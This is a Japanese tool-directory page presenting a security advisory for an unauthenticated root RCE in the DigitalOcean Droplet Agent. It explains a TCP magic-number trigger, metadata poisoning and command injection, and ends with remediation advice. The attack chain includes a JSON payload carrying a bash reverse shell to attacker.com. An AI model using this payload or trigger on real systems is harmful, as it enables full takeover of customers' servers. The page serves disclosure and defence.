Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24516-DigitalOcean-RCE. — CVE-2026-24516 の技術分析と PoC: DigitalOcean Droplet Agent における未認証の root リモートコード実行 (CVSS 10.0)。 | Kitploit
ツール/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce.
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトクラウドセキュリティ論文と研究レッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ペイロード開発
GitHubpoxsky/cve-2026-24516-digitalocean-rce.

CVE-2026-24516-DigitalOcean-RCE.

CVE-2026-24516 の技術分析と PoC: DigitalOcean Droplet Agent における未認証の root リモートコード実行 (CVSS 10.0)。

リポジトリを見る
6ヶ月前未レビュー

CVE-2026-24516-DigitalOcean-RCE。

CVE-2026-24516 の技術分析と PoC: DigitalOcean Droplet Agent における未認証の Root リモートコード実行 (CVSS 10.0)。

技術セキュリティアドバイザリ: CVE-2026-24516

ID: CVE-2026-24516

タイトル: メタデータポイズニングとサイドチャネルを悪用した未認証の Root RCE

深刻度: 緊急 (CVSS v3.1: 10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

研究者: Anmol Singh Rajput (@poxsky)

影響範囲: DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2

================================================================================

  1. アーキテクチャ概要

'droplet-agent' は、リモートテレメトリと診断のために設計された特権システムデーモン (UID 0) です。特定のシグナリングシーケンスを受信するまで、パッシブな監視状態を維持します。中核となる脆弱性は、リンクローカルメタデータサービス (169.254.169.254) の「暗黙的信頼モデル」にあり、暗号学的完全性チェックが欠如しています。

  1. 詳細分析: エクスプロイトプリミティブ

A. パッシブ TCP サイドチャネル (シグナリング層) エージェントは、ポート 22 上で raw ソケットリスナー (internal/metadata/watcher/ssh_watcher.go) を利用します。TCP ヘッダー内のハードコードされたマジック定数に基づいて、IDLE から ACTIVE への状態遷移を実行します:

  • シーケンス番号 (Seq): 0x419AD37 (68796879 -> "DODO")
  • 確認応答番号 (Ack): 0xCF259 (848489 -> "TTY")

分析: これにより決定論的なトリガーが生成されます。外部の攻撃者は、これらのマジック値を含む単一の TCP SYN パケットをスプーフィングすることで、インフラストラクチャのコントロールプレーンを偽装できます。

B. 信頼境界の侵害 (リンクローカルの欠陥) シグナリング後、エージェントはクラウドメタデータエンドポイントから JSON 命令を取得します。この脆弱性は真正性検証の欠如です。エージェントは 169.254.169.254 ゾーンを「堅牢化された信頼ゾーン」として扱い、ペイロード署名 (HMAC/mTLS) の検証に失敗します。

C. シンク: サニタイズされていないコマンドインジェクション 'TroubleshootingActioner' (internal/troubleshooting/actioner/actioner.go) には、'requesting' 配列を解析するシンクが含まれています。

  • 脆弱なシンク: exec.CommandContext(ctx, name, args...)
  • ロジックの欠陥: 検証ロジックはプレフィックスチェック ('command:') のみを実行します。入力のトークン化やシェルメタ文字 (;, |, &, $) のサニタイズに失敗します。
  1. 武器化された攻撃チェーン (SSRF から Root RCE へ)

  1. 偽装: 攻撃者は、ホストされたアプリケーション内の SSRF を特定し、リンクローカルメタデータサービスへのリクエストをプロキシします。

  2. ポイズニング: 攻撃者は、以下を返す悪意のあるメタデータサーバーをセットアップします: {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}

  3. ノック: 攻撃者は「DODO-TTY」TCP トリガーをポート 22 に送信します。

  4. 実行: エージェントはポイズニングされた JSON を取得し、実効 UID 0 (Root) でリバースシェルを実行します。

  5. 影響評価


  • 完全なシステム侵害: カーネルレベルの完全なアクセス。
  • 永続化: ルートキットや永続的な SSH バックドアを注入する能力。
  • テナントリスク: 任意の顧客アプリにおける単一の SSRF が、すべての OS レベルのファイアウォールをバイパスして、ドロップレット全体の乗っ取りにつながります。
  1. 修復戦略

  • 暗号学的完全性: すべてのメタデータペイロードに対して JWT/HMAC 署名を実装します。
  • 名前空間の分離: アクショナーを制限された PID/ネットワーク名前空間で実行します。
  • 許可リスト: 不変の診断バイナリのセットをハードコードし、すべての動的な文字列入力を拒否します。
1000071250 1000071254 1000071252 1000071246 1000071243 1000071244 1000071247 1000071249 1000071251
ツールをダウンロード